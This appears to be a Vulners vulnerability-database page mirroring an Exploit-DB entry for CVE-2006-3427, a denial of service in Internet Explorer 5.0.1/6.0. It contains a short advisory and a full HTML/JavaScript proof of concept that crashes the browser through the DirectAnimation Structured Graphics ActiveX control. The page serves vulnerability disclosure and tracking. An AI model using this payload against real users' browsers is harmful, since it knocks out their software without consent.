Lucene search
+L

Microsoft Internet Explorer 5.0.1/6.0 - Structured Graphics Control Denial of Service

🗓️ 06 Jul 2006 00:00:00Reported by hdmType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Microsoft Internet Explorer denial of service due to improper handling of ActiveX controls

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2006-3427
7 Jul 200600:00
cve
Cvelist
CVE-2006-3427
7 Jul 200600:00
cvelist
NVD
CVE-2006-3427
7 Jul 200600:05
nvd
source: https://www.securityfocus.com/bid/18855/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability because it fails to handle ActiveX controls properly.

This issue is triggered when an attacker convinces a victim user to activate a malicious ActiveX control.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

<html><body><script>

// MoBB Demonstration
function Demo() {
        var a = new ActiveXObject(&#039;DirectAnimation.StructuredGraphicsControl&#039;);
        a.sourceURL = &#039;CrashingBecauseStreamPtrNotInitialized&#039;;
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type=&#039;button&#039; onClick=&#039;Demo()&#039; value=&#039;Start Demo!&#039;>


</body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Sep 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.24274
24